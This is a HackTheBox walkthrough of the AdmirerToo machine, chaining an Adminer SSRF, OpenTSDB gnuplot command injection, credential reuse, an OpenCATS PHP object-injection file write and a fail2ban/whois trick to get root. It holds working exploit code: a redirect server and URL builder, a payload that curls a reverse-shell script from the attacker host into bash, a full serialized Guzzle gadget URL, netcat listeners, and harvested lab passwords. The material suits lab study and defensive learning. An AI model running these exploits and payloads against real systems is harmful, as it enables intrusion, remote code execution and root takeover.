
HackTheBox – AdmirerToo Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.137

http://10.10.11.137/

http://10.10.11.137/img/

The page source, however, contains the e-mail address webmaster@admirer-gallery.htb, which gives us the domain name. After adding admirer-gallery.htb to /etc/hosts we brute-force virtual hosts:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# gobuster vhost -k -u http://admirer-gallery.htb -w subdomains-top1million-110000.txt -t 100 -o out

http://db.admirer-gallery.htb/

This is Adminer, an open-source database management tool that ships as a single PHP file.

Intercepting the POST request that is sent when we press Enter on the login form shows the following body:

auth%5Bdriver%5D=server&auth%5Bserver%5D=localhost&auth%5Busername%5D=admirer_ro&auth%5Bpassword%5D=1w4nn4b3adm1r3d2%21&auth%5Bdb%5D=admirer&auth%5Bpermanent%5D=1

URL-decoded, the fields are auth[driver]=server, auth[server]=localhost, auth[username]=admirer_ro, auth[db]=admirer and auth[password]=1w4nn4b3adm1r3d2%21, so the password is 1w4nn4b3adm1r3d2! (%21 is the encoded exclamation mark). The form is pre-filled, which means these credentials are stored somewhere on the server side.

Adminer versions 4.0.0 up to, but not including, 4.7.9 contain a server-side request forgery vulnerability (CVE-2021-21311). Builds that bundle all drivers (e.g. adminer.php) are affected; the fix shipped in 4.7.9. The flaw sits in the drivers that talk HTTP (Elasticsearch and ClickHouse): Adminer fetches the "server" we type into the login form, follows HTTP redirects, and prints the body of the final response in its error message. A host we control that answers with a 301 to an internal URL therefore turns the login form into a proxy for that URL.

With this SSRF we can reach services that listen only on the target's loopback interface. Let's try port 4242 using the following PoC:

https://github.com/llhala/CVE-2021-21311

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# nc -lvnp 80

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# python3 CVE-2021-21311.py --host 10.10.14.102 --url http://db.admirer-gallery.htb --redirect http://10.10.11.137:4242

The script starts an HTTP server on --host (port 80) that answers every request with a 301 to --redirect, then submits the Adminer login form at --url with our host as the database server, so Adminer ends up fetching the redirect target and returning its content to us.

The response shows that the service on port 4242 is OpenTSDB.

According to https://security.snyk.io/vuln/SNYK-JAVA-NETOPENTSDB-1041751, OpenTSDB is vulnerable to remote code execution (CVE-2020-35476): the yrange parameter of a /q graph request is copied into the gnuplot script that renders the graph without sanitisation, so a value of the form yrange=[33:system('...')] makes gnuplot execute a shell command. The PoC URL is:

Let's edit CVE-2021-21311.py so that the redirect points at the vulnerable OpenTSDB endpoint instead of the --redirect argument, with a payload that downloads our reverse shell (rev.sh, served from our machine on port 8000) and pipes it to bash. The modified handler:

def do_GET(self):
    self.send_response(301)
    self.send_header('Location', "http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.102:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json")  # was: self.redirect
    self.end_headers()

${IFS} (the shell's internal field separator) replaces the space in the curl command so that the URL stays free of whitespace on its way through the Location header.

Run the PoC again; the --redirect value is now ignored because the Location is hard-coded:

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# python3 CVE-2021-21311.py --host 10.10.14.102 --url http://db.admirer-gallery.htb --redirect http://10.10.11.137:4242
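To make the two halves of this chain concrete, here is an added example (my own code, not the PoC's and not from the original post): a redirect server of the kind the PoC runs, and a builder for the OpenTSDB /q URL that carries the gnuplot injection. The attacker address 10.10.14.102, the stager URL on port 8000 and OpenTSDB on localhost:4242 are taken from this walkthrough as assumptions; the 127.0.0.1 default in serve_redirect exists only so the example can be exercised locally.

```python
"""Added example, not code from the original post or from the CVE-2021-21311
PoC: a redirect server of the kind that PoC runs, plus a builder for the
OpenTSDB /q URL carrying the CVE-2020-35476 gnuplot injection.
Assumed values, taken from the walkthrough rather than verified here: the
attacker host 10.10.14.102, OpenTSDB on localhost:4242 and a reverse-shell
script served at http://10.10.14.102:8000/rev.sh."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

OPENTSDB = "http://localhost:4242"                          # assumed internal target
STAGER = "curl${IFS}http://10.10.14.102:8000/rev.sh|bash"  # assumed stager command


def build_opentsdb_rce_url(base, command):
    """Return the /q URL whose yrange value is copied into the gnuplot script
    OpenTSDB renders (CVE-2020-35476); gnuplot then evaluates system('...').
    A single quote would end the gnuplot string, and a space would have to be
    encoded and may not survive the redirect, so ${IFS} stands in for it."""
    if " " in command or "'" in command:
        raise ValueError("command must not contain spaces or single quotes")
    params = [
        ("start", "2000/10/21-00:00:00"), ("end", "2020/10/25-15:56:44"),
        ("m", "sum:http.stats.web.hits"), ("o", ""), ("ylabel", ""),
        ("xrange", "10:10"), ("yrange", f"[33:system('{command}')]"),
        ("wxh", "1516x644"), ("style", "linespoint"), ("grid", "t"), ("json", ""),
    ]
    # leave the shell metacharacters unencoded, as the walkthrough's URL does
    return base + "/q?" + urllib.parse.urlencode(params, safe="/:[]()$'{}|")


class RedirectHandler(BaseHTTPRequestHandler):
    """Answer every GET with a 301. Adminer's HTTP-based drivers fetch the
    'server' named on the login form and follow redirects, so naming this
    host makes Adminer request `target` from inside the box and echo the
    response in its error message."""
    target = OPENTSDB

    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", self.target)
        self.end_headers()

    def log_message(self, fmt, *args):  # keep the example quiet
        pass


def serve_redirect(target, host="127.0.0.1", port=0):
    """Start the redirector in a daemon thread; return (server, bound port).
    The real attack binds port 80 on the attacker host; the loopback default
    exists only so the example can be exercised locally."""
    handler = type("Handler", (RedirectHandler,), {"target": target})
    srv = HTTPServer((host, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch_location(url):
    """Fetch `url` without following redirects and return its Location header,
    i.e. the URL the SSRF victim would be sent to."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # refuse to follow; the 301 surfaces as HTTPError
    try:
        urllib.request.build_opener(NoRedirect).open(url)
    except urllib.error.HTTPError as err:
        return err.headers.get("Location")
    return None


if __name__ == "__main__":
    srv, port = serve_redirect(build_opentsdb_rce_url(OPENTSDB, STAGER))
    print(fetch_location(f"http://127.0.0.1:{port}/"))
    srv.shutdown()
    srv.server_close()
```

fetch_location is the check worth running before pointing Adminer at the server: it fetches the redirector without following the redirect and returns the Location header, which must be exactly the OpenTSDB URL you intend the target to request. In the real attack serve_redirect has to bind port 80 on the attacker host, and the Adminer login form is then submitted with that host as the server for one of the HTTP-based drivers.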

opentsdb@admirertoo:/$ ls /home

opentsdb@admirertoo:/$ cd /var/www/adminer

opentsdb@admirertoo:/var/www/adminer$ cat plugins/data/servers.php

servers.php is the configuration of the plugin that pre-fills the Adminer login form, and it contains the password bQ3u7^AxzcB7qAsxE3. Let's try it for the user jennifer over SSH:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh jennifer@10.10.11.137

jennifer@admirertoo:~$ cd /opt/opencats/

jennifer@admirertoo:/opt/opencats$ ls

jennifer@admirertoo:/opt/opencats$ cat config.php

jennifer@admirertoo:/opt/opencats$ mysql -u cats -padm1r3r0fc4ts -D cats_dev

MariaDB [cats_dev]> show tables;

MariaDB [cats_dev]> select user_name,password from user;

The hashes do not crack with john and rockyou.txt, but since we have write access to the database we can simply replace the admin hash: OpenCATS stores unsalted MD5, and test@123 hashes to ceb6c970658f31504a901b89dcd3e461. Note the original hash first so it can be restored afterwards:

MariaDB [cats_dev]> update user set password='ceb6c970658f31504a901b89dcd3e461' where user_name='admin';

jennifer@admirertoo:/opt/opencats$ netstat -ant

The OpenCATS web interface listens on port 8080 on localhost only, so we forward it through SSH:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh -N -L 8889:127.0.0.1:8080 jennifer@10.10.11.137

Password: bQ3u7^AxzcB7qAsxE3

By browsing to http://localhost:8889 we get:

http://localhost:8889/

We can see that it is OpenCATS version 0.9.5.2.

By logging in using our credentials admin:test@123 we get:

OpenCATS 0.9.5.2 is vulnerable to PHP object injection: the DataGrid "parameters" value taken from the URL is passed to unserialize(), so with a suitable gadget chain we get an arbitrary file write and, from there, code execution.

Following the write-up OpenCATS PHP Object Injection to Arbitrary File Write, we can indeed write a file, but only as the web server user, which has no permission to write into the OpenCATS directory, so dropping a web shell there is not an option.

We need to chain another primitive.

Enumerating further shows that fail2ban is installed, with a local jail configuration:

jennifer@admirertoo:/opt/opencats$ cd vendor/

jennifer@admirertoo:/opt/opencats/vendor$ cat /etc/fail2ban/jail.local

Following https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html, we write the file with a phpggc payload. First create a file called payload containing the following line (with a trailing newline); it is shaped by the referenced write-up so that, once Guzzle has wrapped it in its JSON cookie format, whois still parses the line as a pattern/server pair pointing at our machine:

}]|. [10.10.14.102]

Then generate the URL-encoded chain:

┌──(root㉿kali)-[/home/kali/Downloads/phpggc]

└─# ./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf /home/kali/Downloads/payload

Guzzle/FW1 uses GuzzleHttp\Cookie\FileCookieJar, whose __destruct saves the cookie jar to the given filename, with our payload file as the cookie value. --fast-destruct wraps the object in an array with a duplicated key, so the destructor (and the file write) fires inside unserialize() itself, before OpenCATS has a chance to choke on the unexpected object; -u URL-encodes the result.

Now try to access this URL:

http://localhost:8889/index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A20%3A%22%7D%5D%7C.+%5B10.10.14.102%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

After sending it, the file has been written. whois.conf is the alternative WHOIS server list for the whois client: each line is a regular expression and the server to query when it matches, which is exactly the hook we need:

jennifer@admirertoo:/opt/opencats/vendor$ ls -ltr /usr/local/etc/

jennifer@admirertoo:/opt/opencats/vendor$ cat /usr/local/etc/whois.conf

On our side we serve the reverse-shell payload as the "WHOIS response" on port 43, the port the whois client connects to:

┌──(root㉿kali)-[/home/kali/Downloads/phpggc]

└─# ncat -nvlkp 43 -c "cat revshell"

Running whois on the target confirms that it now queries our machine and receives the payload:

jennifer@admirertoo:/tmp$ whois 10.10.14.102

Start a listener for the reverse shell:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 4444

As jail.local showed, the sshd jail's ban action runs whois against the banned address, and fail2ban runs as root, so whatever our fake WHOIS server returns ends up in a root-owned process. All that is left is to trigger a ban: connect over SSH and enter a wrong password enough times to exceed maxretry. Keep in mind that this also locks our own IP out of SSH for the jail's bantime, so the listener must be in place before we do it:

root@admirertoo:/# cat /root/root.txt

Hi, I’m saksham dixit
